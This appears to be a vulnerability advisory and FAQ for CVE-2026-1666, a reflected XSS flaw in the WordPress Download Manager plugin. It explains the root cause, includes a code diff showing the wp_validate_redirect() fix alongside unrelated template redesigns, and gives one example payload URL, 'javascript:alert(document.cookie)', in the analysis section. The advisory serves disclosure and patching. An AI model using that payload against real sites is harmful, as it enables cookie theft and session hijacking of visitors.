What is CVE-2026-1666?

CVE-2026-1666 is a reflected cross-site scripting (XSS) vulnerability in the Download Manager plugin for WordPress. It affects versions up to and including 3.3.46, allowing unauthenticated attackers to inject malicious scripts via the ‘redirect_to’ parameter in the login form.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping for the ‘redirect_to’ GET parameter. Attackers can craft URLs containing JavaScript payloads that execute in the victim’s browser when they interact with the login form.

Who is affected by this vulnerability?

All users of the Download Manager plugin for WordPress who are running version 3.3.46 or earlier are affected. Administrators should verify their plugin version to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, confirm that you are using Download Manager version 3.3.46 or earlier. You can do this by navigating to the Plugins section in your WordPress admin panel and checking the version number.

How can I fix this vulnerability?

The vulnerability is fixed in version 3.3.47 of the Download Manager plugin. Administrators should update the plugin to the latest version immediately to mitigate the risk.

What does the CVSS score of 6.1 mean?

A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while the vulnerability requires user interaction to exploit, it can still lead to significant risks such as session hijacking or phishing.

What are the potential risks of exploitation?

Successful exploitation can allow attackers to execute arbitrary JavaScript in the victim’s browser, leading to session hijacking, account takeover, or redirection to malicious sites. This can compromise user credentials and sensitive information.

What is a proof of concept (PoC)?

A proof of concept (PoC) is a demonstration that illustrates how the vulnerability can be exploited. In this case, the PoC shows how an attacker can craft a URL with a malicious ‘redirect_to’ parameter to execute JavaScript in the victim’s browser.

How does the patch mitigate the vulnerability?

The patch replaces the insecure `strip_tags()` function with `wp_validate_redirect()`, which properly validates URLs to prevent malicious redirects. This ensures that only safe URLs are processed, effectively mitigating the XSS risk.

What steps should I take after updating the plugin?

After updating the plugin, it is advisable to review user access logs for any suspicious activity and educate users about the risks of clicking on unknown links. Regularly monitor your site for security updates and vulnerabilities.

Can this vulnerability be exploited without user interaction?

No, this vulnerability requires user interaction to be exploited. Attackers must trick users into clicking a crafted link that includes the malicious ‘redirect_to’ parameter to execute the attack.

Is there a way to further secure my WordPress site?

To further secure your WordPress site, consider implementing security plugins, regularly updating all plugins and themes, and conducting security audits. Additionally, educate users about phishing and social engineering tactics.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1666: Download Manager <= 3.3.46 – Reflected Cross-Site Scripting via 'redirect_to' Parameter (download-manager)

CVE ID CVE-2026-1666

Plugin download-manager

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 3.3.46

Patched Version 3.3.47

Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1666:
This vulnerability is a reflected cross-site scripting (XSS) flaw in the Download Manager WordPress plugin. The issue affects the ‘redirect_to’ parameter in the login form shortcode across all plugin versions up to and including 3.3.46. Unauthenticated attackers can inject malicious JavaScript payloads that execute when victims click specially crafted links. The CVSS score of 6.1 reflects a medium-severity impact requiring user interaction.

The root cause is insufficient input sanitization and output escaping for the ‘redirect_to’ GET parameter. The vulnerable code resides in three methods within the Login class: `form()`, `shortcode()`, and `loginForm()`. These methods are located in `/download-manager/src/User/Login.php` at lines 141, 396, and 540 respectively. Each method processes the `$log_redirect` variable containing user-supplied redirect URLs. The original code used `strip_tags($log_redirect)` which fails to properly sanitize JavaScript payloads embedded in URLs.

Exploitation occurs through the plugin’s login form shortcode. Attackers craft malicious URLs containing the ‘redirect_to’ parameter with JavaScript payloads. For example: `https://victim-site.com/login-page/?redirect_to=javascript:alert(document.cookie)//`. When users visit this URL, the login form displays with the malicious redirect value. If the user interacts with the form or the page processes the parameter, the JavaScript executes in the victim’s browser context. The attack requires social engineering to trick users into clicking the malicious link.

The patch replaces `strip_tags()` with `wp_validate_redirect()` in all three vulnerable methods. The WordPress core function `wp_validate_redirect()` properly validates URLs against a whitelist and ensures they belong to the same site. It returns a safe default URL (home_url(‘/’)) when validation fails. This change prevents JavaScript scheme URLs and external domain redirects. The patch also updates the plugin version from 3.3.46 to 3.3.47 in the main plugin file.

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of the victim’s browser session. This can lead to session hijacking, account takeover, content manipulation, and phishing attacks. Attackers could steal authentication cookies, redirect users to malicious sites, or perform actions on behalf of authenticated users. The vulnerability requires user interaction but no authentication, making it accessible to any attacker who can craft and distribute malicious links.

Differential between vulnerable and patched code

Code Diff

--- a/download-manager/download-manager.php
+++ b/download-manager/download-manager.php
@@ -5,7 +5,7 @@
 Description: Manage, Protect and Track file downloads, and sell digital products from your WordPress site. A complete digital asset management solution.
 Author: W3 Eden, Inc.
 Author URI: https://www.wpdownloadmanager.com/
-Version: 3.3.46
+Version: 3.3.47
 Text Domain: download-manager
 Domain Path: /languages
 */
@@ -40,7 +40,7 @@

 global $WPDM;

-define('WPDM_VERSION','3.3.46');
+define('WPDM_VERSION','3.3.47');

 define('WPDM_TEXT_DOMAIN','download-manager');

--- a/download-manager/src/Package/views/page-templates/page-template-1col-flat.php
+++ b/download-manager/src/Package/views/page-templates/page-template-1col-flat.php
@@ -37,17 +37,10 @@
     </div>
     <div class="card mb-3">
         <div class="card-header">
-
-            <div class="nav nav-tabs card-header-tabs" id="nav-tab" role="tablist">
-                <a class="nav-item nav-link active" id="nav-home-tab" data-toggle="tab" href="#nav-desc" role="tab" aria-controls="nav-home" aria-selected="true">[txt=Description]</a>
-            </div>
+            [txt=Description]
         </div>
         <div class="card-body">
-            <div class="tab-content" id="nav-tabContent">
-                <div class="tab-pane active" id="nav-desc" role="tabpanel" aria-labelledby="nav-home-tab">[description]</div>
-
-            </div>
-
+            [description]
         </div>
     </div>

--- a/download-manager/src/User/Dashboard.php
+++ b/download-manager/src/User/Dashboard.php
@@ -52,6 +52,14 @@
     {
         global $wp_query, $WPDM;

+        // Enqueue dashboard styles only when shortcode is used
+        wp_enqueue_style('wpdm-dashboard', WPDM_ASSET_URL . 'css/wpdm-dashboard.min.css', [], WPDM_VERSION);
+
+        // Enqueue media scripts for profile picture upload
+        if (is_user_logged_in()) {
+            wp_enqueue_media();
+        }
+
         ob_start();
         if (!is_user_logged_in()) {
             echo WPDM()->user->login->form($params);
--- a/download-manager/src/User/Login.php
+++ b/download-manager/src/User/Login.php
@@ -141,7 +141,7 @@
         $up = parse_url($log_redirect);
         if (isset($up['host']) && $up['host'] != $_SERVER['SERVER_NAME']) $log_redirect = __::valueof($_SERVER, 'REQUEST_URI', ['validate' => 'escs']);

-        $log_redirect = strip_tags($log_redirect);
+        $log_redirect = wp_validate_redirect($log_redirect, home_url('/'));

         if (!isset($params['logo'])) $params['logo'] = get_site_icon_url();

@@ -396,7 +396,7 @@
         $up = parse_url($log_redirect);
         if (isset($up['host']) && $up['host'] != $_SERVER['SERVER_NAME']) $log_redirect = __::valueof($_SERVER, 'REQUEST_URI', ['validate' => 'escs']);

-        $log_redirect = strip_tags($log_redirect);
+        $log_redirect = wp_validate_redirect($log_redirect, home_url('/'));

         if (!isset($params['logo']) || $params['logo'] == '') $params['logo'] = get_site_icon_url();

@@ -540,7 +540,7 @@
         $up = parse_url($log_redirect);
         if (isset($up['host']) && $up['host'] != $_SERVER['SERVER_NAME']) $log_redirect = __::valueof($_SERVER, 'REQUEST_URI', ['validate' => 'escs']);

-        $log_redirect = strip_tags($log_redirect);
+        $log_redirect = wp_validate_redirect($log_redirect, home_url('/'));

         if (!isset($params['logo']) || $params['logo'] == '') $params['logo'] = get_site_icon_url();

--- a/download-manager/src/User/views/already-logged-in.php
+++ b/download-manager/src/User/views/already-logged-in.php
@@ -8,212 +8,303 @@
  */

 if (!defined('ABSPATH')) die();
-?>

-<div class="w3eden">
-    <div class="wpdm-logged-in-card">
-        <!-- Success indicator -->
-        <div class="wpdm-logged-in-badge">
-            <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2.5" stroke-linecap="round" stroke-linejoin="round">
-                <polyline points="20 6 9 17 4 12"></polyline>
-            </svg>
-        </div>
+// Get color scheme to prevent flickering
+$color_scheme = get_option('__wpdm_color_scheme', 'system');
+$color_class = '';
+if ($color_scheme === 'dark') {
+    $color_class = 'dark-mode';
+} elseif ($color_scheme === 'light') {
+    $color_class = 'light-mode';
+}

-        <!-- Avatar with online indicator -->
-        <div class="wpdm-logged-in-avatar">
-            <img src="<?php echo esc_url(get_avatar_url(get_current_user_id(), ['size' => 160])); ?>" alt="<?php echo esc_attr($current_user->display_name); ?>" />
-            <span class="wpdm-online-dot"></span>
-        </div>
+// Get user avatar URL
+$avatar_url = get_avatar_url(get_current_user_id(), ['size' => 200, 'default' => 'mp']);

-        <!-- User info -->
-        <div class="wpdm-logged-in-info">
-            <span class="wpdm-logged-in-greeting"><?php _e("Welcome back", "download-manager"); ?></span>
-            <h3 class="wpdm-logged-in-name"><?php echo esc_html($current_user->display_name); ?></h3>
-            <p class="wpdm-logged-in-email"><?php echo esc_html($current_user->user_email); ?></p>
-        </div>
+// Enqueue auth styles for consistency
+wp_enqueue_style('wpdm-auth-forms', WPDM__Template::locate_url('auth-forms.css', __DIR__), [], WPDM_VERSION);
+?>

-        <!-- Action buttons -->
-        <div class="wpdm-logged-in-actions">
-            <a href="<?php echo esc_url(wpdm_user_dashboard_url()); ?>" class="btn btn-lg btn-primary">
-                <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
-                    <path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2"></path>
-                    <circle cx="12" cy="7" r="4"></circle>
-                </svg>
-                <?php _e("My Account", "download-manager"); ?>
-            </a>
-            <a href="<?php echo esc_url(wpdm_logout_url()); ?>" class="btn btn-lg btn-outline-secondary wpdm-btn-logout">
-                <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
-                    <path d="M9 21H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h4"></path>
-                    <polyline points="16 17 21 12 16 7"></polyline>
-                    <line x1="21" y1="12" x2="9" y2="12"></line>
-                </svg>
-                <?php _e("Logout", "download-manager"); ?>
-            </a>
+<div class="w3eden wpdm-auth-page <?php echo esc_attr($color_class); ?>" id="wpdm-already-logged-in">
+    <div class="wpdm-auth-split">
+        <div class="wpdm-auth-panel wpdm-auth-panel--centered">
+            <!-- Left Panel - Decorative -->
+            <div class="wpdm-auth-left">
+                <div class="wpdm-auth-grid"></div>
+                <div class="wpdm-auth-circles">
+                    <div class="wpdm-auth-circle"></div>
+                    <div class="wpdm-auth-circle"></div>
+                    <div class="wpdm-auth-circle"></div>
+                    <div class="wpdm-auth-circle"></div>
+                </div>
+
+                <div class="wpdm-auth-brand">
+                    <a href="<?php echo home_url(); ?>">
+                    <?php $logo = get_site_icon_url(); if($logo){ ?>
+                        <img src="<?php echo esc_attr($logo); ?>" alt="<?php echo esc_attr(get_bloginfo('name')); ?>" />
+                    <?php } else { ?>
+                        <div class="wpdm-auth-brand-icon">
+                            <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><circle cx="12" cy="12" r="10"/><path d="M12 16v-4"/><path d="M12 8h.01"/></svg>
+                        </div>
+                    <?php } ?>
+                    <span><?php echo esc_html(get_bloginfo('name')); ?></span>
+                    </a>
+                </div>
+
+                <div class="wpdm-auth-welcome">
+                    <div class="wpdm-auth-welcome-sub"><?php _e("You're signed in", "download-manager"); ?></div>
+                    <div class="wpdm-auth-welcome-title"><?php _e("WELCOME BACK", "download-manager"); ?></div>
+                    <div class="wpdm-auth-welcome-line"></div>
+                    <div class="wpdm-auth-welcome-text">
+                        <?php _e("You're already logged in. Visit your dashboard to manage downloads or logout to switch accounts.", "download-manager"); ?>
+                    </div>
+                </div>
+            </div>
+
+            <!-- Right Panel - Content -->
+            <div class="wpdm-auth-right">
+                <div class="wpdm-logged-in-content">
+                    <!-- Avatar with success ring -->
+                    <div class="wpdm-logged-in-avatar-wrap">
+                        <div class="wpdm-logged-in-avatar">
+                            <img src="<?php echo esc_url($avatar_url); ?>" alt="<?php echo esc_attr($current_user->display_name); ?>" />
+                            <span class="wpdm-avatar-check">
+                                <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="3" stroke-linecap="round" stroke-linejoin="round">
+                                    <polyline points="20 6 9 17 4 12"></polyline>
+                                </svg>
+                            </span>
+                        </div>
+                    </div>
+
+                    <!-- User info -->
+                    <div class="wpdm-logged-in-info">
+                        <h3 class="wpdm-logged-in-name"><?php echo esc_html($current_user->display_name); ?></h3>
+                        <p class="wpdm-logged-in-email"><?php echo esc_html($current_user->user_email); ?></p>
+                    </div>
+
+                    <!-- Action buttons -->
+                    <div class="wpdm-logged-in-actions">
+                        <a href="<?php echo esc_url(wpdm_user_dashboard_url()); ?>" class="wpdm-auth-btn">
+                            <svg viewBox="0 0 24 24" width="18" height="18" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
+                                <rect x="3" y="3" width="7" height="9"></rect>
+                                <rect x="14" y="3" width="7" height="5"></rect>
+                                <rect x="14" y="12" width="7" height="9"></rect>
+                                <rect x="3" y="16" width="7" height="5"></rect>
+                            </svg>
+                            <span><?php _e("Go to Dashboard", "download-manager"); ?></span>
+                        </a>
+                    </div>
+
+                    <div class="wpdm-logged-in-footer">
+                        <span><?php _e("Not you?", "download-manager"); ?></span>
+                        <a href="<?php echo esc_url(wpdm_logout_url()); ?>" class="wpdm-logout-link">
+                            <?php _e("Sign out", "download-manager"); ?>
+                            <svg viewBox="0 0 24 24" width="14" height="14" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
+                                <path d="M9 21H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h4"></path>
+                                <polyline points="16 17 21 12 16 7"></polyline>
+                                <line x1="21" y1="12" x2="9" y2="12"></line>
+                            </svg>
+                        </a>
+                    </div>
+                </div>
+            </div>
         </div>
     </div>
 </div>

 <style>
-    .w3eden .wpdm-logged-in-card {
-        max-width: 380px;
-        margin: 0 auto;
-        padding: 24px;
-        background: #ffffff;
-        border-radius: 16px;
-        box-shadow: 0 4px 24px rgba(0, 0, 0, 0.06), 0 1px 2px rgba(0, 0, 0, 0.04);
+    /* Already Logged In - Uses auth-forms.css base styles */
+
+    .wpdm-auth-panel--centered {
+        min-height: auto;
+    }
+
+    .wpdm-logged-in-content {
         text-align: center;
+        padding: 40px 0 20px;
+    }
+
+    /* Avatar wrapper with glow effect */
+    .wpdm-logged-in-avatar-wrap {
+        display: flex;
+        justify-content: center;
+        margin-bottom: 24px !important;
+    }
+
+    .wpdm-logged-in-avatar {
         position: relative;
-        font-family: var(--wpdm-font);
+        width: 120px;
+        height: 120px;
     }

-    /* Success badge */
-    .w3eden .wpdm-logged-in-badge {
+    .wpdm-logged-in-avatar::before {
+        content: '';
         position: absolute;
-        top: -16px;
-        left: 50%;
-        transform: translateX(-50%);
-        width: 40px;
-        height: 40px;
-        background: var(--color-success);
+        inset: -4px;
+        background: linear-gradient(135deg, #10b981 0%, #6366f1 50%, #8b5cf6 100%);
         border-radius: 50%;
-        display: flex;
-        align-items: center;
-        justify-content: center;
-        box-shadow: 0 4px 12px rgba(var(--color-success-rgb), 0.4);
+        animation: wpdm-gradient-spin 3s linear infinite;
+        width: calc(100% + 8px);
+        height: calc(100% + 8px);
     }

-    .w3eden .wpdm-logged-in-badge svg {
-        width: 20px;
-        height: 20px;
-        color: #fff;
+    @keyframes wpdm-gradient-spin {
+        0% { transform: rotate(0deg); }
+        100% { transform: rotate(360deg); }
     }

-    /* Avatar */
-    .w3eden .wpdm-logged-in-avatar {
-        position: relative;
-        display: inline-block;
-        margin-top: 20px;
-        margin-bottom: 20px;
+    .wpdm-logged-in-avatar::after {
+        content: '';
+        position: absolute;
+        inset: 0;
+        background: var(--wpdm-auth-card-bg, #fff);
+        border-radius: 50%;
     }

-    .w3eden .wpdm-logged-in-avatar img {
-        width: 100px;
-        height: 100px;
+    .wpdm-logged-in-avatar img {
+        position: relative;
+        z-index: 1;
+        width: 100%;
+        height: 100%;
         border-radius: 50%;
         object-fit: cover;
-        border: 4px solid #e2e8f0;
-        box-shadow: 0 4px 12px rgba(0, 0, 0, 0.08);
+        border: 4px solid var(--wpdm-auth-card-bg, #fff);
     }

-    .w3eden .wpdm-online-dot {
+    /* Success check badge */
+    .wpdm-avatar-check {
         position: absolute;
-        bottom: 6px;
-        right: 6px;
-        width: 16px;
-        height: 16px;
-        background: var(--color-success);
-        border: 3px solid #fff;
+        z-index: 2;
+        bottom: 0;
+        right: 0;
+        width: 32px;
+        height: 32px;
+        background: linear-gradient(135deg, #10b981 0%, #059669 100%);
         border-radius: 50%;
-        box-shadow: 0 2px 4px rgba(var(--color-success-rgb), 0.4);
+        border: 3px solid var(--wpdm-auth-card-bg, #fff);
+        display: flex;
+        align-items: center;
+        justify-content: center;
+        box-shadow: 0 4px 12px rgba(16, 185, 129, 0.4);
     }

-    /* User info */
-    .w3eden .wpdm-logged-in-info {
-        margin-bottom: 20px;
+    .wpdm-avatar-check svg {
+        width: 14px;
+        height: 14px;
+        color: #fff;
     }

-    .w3eden .wpdm-logged-in-greeting {
-        display: block;
-        font-size: 13px;
-        font-weight: 500;
-        color: var(--color-success);
-        text-transform: uppercase;
-        letter-spacing: 0.5px;
-        margin-bottom: 6px;
+    /* User info */
+    .wpdm-logged-in-info {
+        margin-bottom: 32px !important;
     }

-    .w3eden .wpdm-logged-in-name {
-        margin: 0 0 4px 0;
-        font-size: 22px;
+    .wpdm-logged-in-name {
+        margin: 0 0 8px 0 !important;
+        font-size: 26px;
         font-weight: 700;
+        color: var(--wpdm-auth-text, #1e293b);
         line-height: 1.3;
     }

-    .w3eden .wpdm-logged-in-email {
+    .wpdm-logged-in-email {
         margin: 0;
         font-size: 14px;
-        color: var(--color-muted);
+        color: var(--wpdm-auth-text-muted, #64748b);
+        display: inline-flex;
+        align-items: center;
+        gap: 6px;
+        padding: 6px 14px;
+        background: var(--wpdm-auth-bg, #f8fafc);
+        border-radius: 20px;
     }

-    /* Action buttons layout */
-    .w3eden .wpdm-logged-in-actions {
-        display: flex;
-        gap: 12px;
+    /* Action buttons */
+    .wpdm-logged-in-actions {
+        margin-bottom: 28px !important;
     }

-    .w3eden .wpdm-logged-in-actions .btn {
-        flex: 1;
-        letter-spacing: 0px;
+    .wpdm-logged-in-actions .wpdm-auth-btn {
+        display: inline-flex;
+        gap: 10px;
+        padding: 14px 32px;
+        font-size: 15px;
     }

-    /* Logout button - outline style */
-    .w3eden .wpdm-btn-logout {
-        background: transparent;
-        color: var(--color-secondary);
-        border: 1px solid #dadee3;
+    /* Footer with logout link */
+    .wpdm-logged-in-footer {
+        padding-top: 24px !important;
+        border-top: 1px solid var(--wpdm-auth-border, #e2e8f0);
+        font-size: 14px;
+        color: var(--wpdm-auth-text-muted, #64748b);
     }

-    .w3eden .wpdm-btn-logout:hover {
-        background: rgba(var(--color-danger-rgb), 0.1);
-        color: var(--color-danger);
-        border-color: var(--color-danger);
+    .wpdm-logout-link {
+        display: inline-flex;
+        align-items: center;
+        gap: 4px;
+        margin-left: 8px;
+        color: var(--wpdm-auth-text-muted, #64748b);
+        font-weight: 500;
+        text-decoration: none;
+        transition: all 0.2s ease;
     }

-    /* Dark mode support */
-    @media (prefers-color-scheme: dark) {
-        .w3eden:not(.light-mode) .wpdm-logged-in-card {
-            background: var(--dm-bg-secondary);
-        }
-
-        .w3eden:not(.light-mode) .wpdm-logged-in-avatar img {
-            border-color: var(--dm-bg-tertiary);
-        }
-
-        .w3eden:not(.light-mode) .wpdm-online-dot {
-            border-color: var(--dm-bg-secondary);
-        }
-
-        .w3eden:not(.light-mode) .wpdm-logged-in-email {
-            color: var(--dm-text-muted);
-        }
+    .wpdm-logout-link:hover {
+        color: #ef4444;
     }

-    /* Manual dark mode class */
-    .w3eden.dark-mode .wpdm-logged-in-card {
-        background: var(--dm-bg-secondary);
+    /* Dark mode overrides */
+    .wpdm-auth-page.dark-mode .wpdm-logged-in-avatar::after,
+    .wpdm-auth-page.dark-mode .wpdm-logged-in-avatar img,
+    .wpdm-auth-page.dark-mode .wpdm-avatar-check {
+        border-color: var(--wpdm-auth-card-bg, #1e293b);
     }

-    .w3eden.dark-mode .wpdm-logged-in-avatar img {
-        border-color: var(--dm-bg-tertiary);
+    .wpdm-auth-page.dark-mode .wpdm-logged-in-email {
+        background: rgba(255, 255, 255, 0.05);
     }

-    .w3eden.dark-mode .wpdm-online-dot {
-        border-color: var(--dm-bg-secondary);
-    }
+    @media (prefers-color-scheme: dark) {
+        .wpdm-auth-page:not(.light-mode) .wpdm-logged-in-avatar::after,
+        .wpdm-auth-page:not(.light-mode) .wpdm-logged-in-avatar img,
+        .wpdm-auth-page:not(.light-mode) .wpdm-avatar-check {
+            border-color: var(--wpdm-auth-card-bg, #1e293b);
+        }

-    .w3eden.dark-mode .wpdm-logged-in-email {
-        color: var(--dm-text-muted);
+        .wpdm-auth-page:not(.light-mode) .wpdm-logged-in-email {
+            background: rgba(255, 255, 255, 0.05);
+        }
     }

     /* Responsive */
     @media (max-width: 480px) {
-        .w3eden .wpdm-logged-in-card {
-            padding: 36px 24px;
-            margin: 0 16px;
+        .wpdm-logged-in-content {
+            padding: 30px 0 10px;
+        }
+
+        .wpdm-logged-in-avatar {
+            width: 100px;
+            height: 100px;
+        }
+
+        .wpdm-avatar-check {
+            width: 28px;
+            height: 28px;
+        }
+
+        .wpdm-avatar-check svg {
+            width: 12px;
+            height: 12px;
+        }
+
+        .wpdm-logged-in-name {
+            font-size: 22px;
         }

-        .w3eden .wpdm-logged-in-actions {
-            flex-direction: column;
+        .wpdm-logged-in-actions .wpdm-auth-btn {
+            width: 100%;
+            justify-content: center;
         }
     }
 </style>
--- a/download-manager/src/User/views/dashboard/dashboard.php
+++ b/download-manager/src/User/views/dashboard/dashboard.php
@@ -1,61 +1,105 @@
 <?php
+/**
+ * User Dashboard - Main Layout
+ * Slack-style modern interface
+ */

 global $current_user;
-
 $store = get_user_meta(get_current_user_id(), '__wpdm_public_profile', true);
-
+$avatar_url = isset($store['logo']) && $store['logo'] != '' ? $store['logo'] : get_avatar_url($current_user->user_email, ['size' => 256]);
 ?>

-<div class="w3eden user-dashboard">
-    <div class="row">
-        <div id="wdmds" class="col-md-3">
-            <div class="visible-xs mb-2"><button type="button" class="btn btn-info btn-block" onclick="jQuery('#wpdmdbsb').toggleClass('dbopen')">Dashboard Menu</button></div>
-            <div id="wpdmdbsb">
-                <div class="visible-xs" style="position: absolute;right: 0;top: -2px;"><button type="button" class="btn btn-secondary btn-xs" style="border-radius: 0" onclick="jQuery('#wpdmdbsb').toggleClass('dbopen')">Close</button></div>
-            <div id="logo-block">
-                <img class="shop-logo" id="shop-logo" src="<?php echo isset($store['logo']) && $store['logo'] != '' ? $store['logo'] : get_avatar_url( $current_user->user_email, array('size' => 512) ); ?>"/>
+<div class="w3eden wpdm-dashboard">
+    <div class="wpdm-dashboard-frame">
+        <!-- Sidebar -->
+        <aside class="wpdm-sidebar" id="wpdm-sidebar">
+            <!-- User Profile (Top) -->
+            <div class="wpdm-sidebar-header">
+                <div class="wpdm-user-profile">
+                    <div class="wpdm-user-avatar">
+                        <img src="<?php echo esc_url($avatar_url); ?>" alt="<?php echo esc_attr($current_user->display_name); ?>">
+                        <span class="wpdm-user-status"></span>
+                    </div>
+                    <div class="wpdm-user-info">
+                        <span class="wpdm-user-name"><?php echo esc_html($current_user->display_name); ?></span>
+                        <span class="wpdm-user-role"><?php echo esc_html(ucfirst($current_user->roles[0] ?? 'User')); ?></span>
+                    </div>
+                </div>
             </div>
-            <div id="tabs">
+
+            <!-- Navigation -->
+            <nav class="wpdm-sidebar-nav">
                 <?php
-                if(is_array($this->dashboard_menu)) {
+                if (is_array($this->dashboard_menu)) {
                     foreach ($this->dashboard_menu as $section_id => $section) {
-                        echo "<div id='udm-{$section_id}'>";
-                        if (isset($section['title']) && $section['title'] != '') echo "<h3><i class='udbsap'></i>   {$section['title']} </h3>";
+                        if (isset($section['title']) && $section['title'] != '') {
+                            echo '<div class="wpdm-nav-group-title">' . esc_html($section['title']) . '</div>';
+                        }
+                        echo '<div class="wpdm-nav-group">';
                         foreach ($section['items'] as $page_id => $menu_item) {
                             $menu_url = get_permalink(get_the_ID()) . ($page_id != '' ? '?udb_page=' . $page_id : '');
-                            if (isset($params['flaturl']) && $params['flaturl'] == 1)
+                            if (isset($params['flaturl']) && $params['flaturl'] == 1) {
                                 $menu_url = get_permalink(get_the_ID()) . $page_id . ($page_id != '' ? '/' : '');
+                            }
+                            $is_active = ($udb_page == $page_id) ? 'active' : '';
+                            $icon = isset($menu_item['icon']) ? $menu_item['icon'] : (isset($default_icons[$page_id]) ? $default_icons[$page_id] : 'fas fa-circle');
                             ?>
-                            <a class="udb-item <?php echo $udb_page == $page_id ? 'selected' : ''; ?>"
-                               href="<?php echo $menu_url; ?>"><i
-                                        class="m-icon <?php echo isset($menu_item['icon']) ? $menu_item['icon'] : (isset($default_icons[$page_id]) ? $default_icons[$page_id] : 'fab fa-buffer'); ?> mr-3"></i><?php echo $menu_item['name']; ?>
+                            <a class="wpdm-nav-link <?php echo $is_active; ?>" href="<?php echo esc_url($menu_url); ?>">
+                                <i class="<?php echo esc_attr($icon); ?>"></i>
+                                <span><?php echo esc_html($menu_item['name']); ?></span>
                             </a>
-                        <?php }
-                        echo "</div>";
+                            <?php
+                        }
+                        echo '</div>';
                     }
                 }
                 ?>
-                <a class="udb-item" href="<?php echo wpdm_logout_url(); ?>"><i class="m-icon wpdm-logout color-danger mr-3"></i><span class="color-red"><?php _e('Logout', 'wmdpro'); ?></span></a>
+            </nav>

-            </div>
+            <?php do_action("wpdm_user_dashboard_sidebar"); ?>

-            <?php do_action("wpdm_user_dashboard_sidebar") ?>
+            <!-- Logout (Bottom) -->
+            <div class="wpdm-sidebar-footer">
+                <a class="wpdm-logout-link" href="<?php echo esc_url(wpdm_logout_url()); ?>">
+                    <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M9 21H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h4"></path><polyline points="16 17 21 12 16 7"></polyline><line x1="21" y1="12" x2="9" y2="12"></line></svg>
+                    <span><?php esc_html_e('Logout', 'download-manager'); ?></span>
+                </a>
             </div>
-            <div id="bdrp" onclick="jQuery('#wpdmdbsb').removeClass('dbopen')"></div>
-        </div>
-        <div class="col-md-9" id="wdmdc">
-
-
-            <?php echo isset($dashboard_contents) ? $dashboard_contents : ''; ?>
-
-
-        </div>
-
-
-
-
+        </aside>

+        <!-- Mobile Menu Toggle -->
+        <button type="button" class="wpdm-mobile-toggle" id="wpdm-mobile-toggle">
+            <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><line x1="3" y1="12" x2="21" y2="12"></line><line x1="3" y1="6" x2="21" y2="6"></line><line x1="3" y1="18" x2="21" y2="18"></line></svg>
+        </button>
+
+        <!-- Main Content -->
+        <main class="wpdm-main">
+            <div class="wpdm-main-inner">
+                <?php echo isset($dashboard_contents) ? $dashboard_contents : ''; ?>
+            </div>
+        </main>
     </div>
-</div>

+    <!-- Mobile Overlay -->
+    <div class="wpdm-overlay" id="wpdm-overlay"></div>
+</div>

+<script>
+jQuery(function($) {
+    var $sidebar = $('#wpdm-sidebar');
+    var $overlay = $('#wpdm-overlay');
+    var $toggle = $('#wpdm-mobile-toggle');
+
+    $toggle.on('click', function() {
+        $sidebar.addClass('open');
+        $overlay.addClass('visible');
+        $('body').css('overflow', 'hidden');
+    });
+
+    $overlay.on('click', function() {
+        $sidebar.removeClass('open');
+        $overlay.removeClass('visible');
+        $('body').css('overflow', '');
+    });
+});
+</script>
--- a/download-manager/src/User/views/dashboard/download-history.php
+++ b/download-manager/src/User/views/dashboard/download-history.php
@@ -1,81 +1,230 @@
-<?php use WPDM____;
-
-if(!defined('ABSPATH')) die(); ?>
-<?php if(class_exists('WPDMAddOnDownloadLimit')):?>
-<div class="row">
-    <div class="col-md-8">
-        <div class="card card-default dashboard-card">
-            <div class="card-header"><?php _e('Download Limit Resets', 'download-manager'); ?></div>
-            <div class="card-body">
-			    <?php echo do_shortcode("[wpdm_download_limit_reset_timer]") ?>
+<?php
+/**
+ * User Dashboard - Download History
+ * Enterprise-grade design
+ */
+
+use WPDM____;
+
+if (!defined('ABSPATH')) die();
+
+global $wpdb, $current_user, $wp_query;
+
+$items_per_page = 20;
+$current_page = isset($_GET['pgd']) ? max(1, absint($_GET['pgd'])) : 1;
+$start = ($current_page - 1) * $items_per_page;
+
+// Get total count for pagination
+$total_items = (int) $wpdb->get_var($wpdb->prepare(
+    "SELECT COUNT(*) FROM {$wpdb->prefix}ahm_download_stats WHERE uid = %d",
+    $current_user->ID
+));
+
+// Get paginated results
+$downloads = $wpdb->get_results($wpdb->prepare(
+    "SELECT p.post_title, s.* FROM {$wpdb->prefix}posts p, {$wpdb->prefix}ahm_download_stats s
+     WHERE s.uid = %d AND s.pid = p.ID
+     ORDER BY s.timestamp DESC
+     LIMIT %d, %d",
+    $current_user->ID,
+    $start,
+    $items_per_page
+));
+
+$total_pages = ceil($total_items / $items_per_page);
+?>
+
+<?php do_action("wpdm_before_download_history"); ?>
+
+<?php if (class_exists('WPDMAddOnDownloadLimit')): ?>
+<!-- Download Limit Info -->
+<div class="row mb-3">
+    <div class="col-md-6 mb-2">
+        <div class="card h-100">
+            <div class="card-body py-3">
+                <div class="media">
+                    <div class="mr-3 text-info">
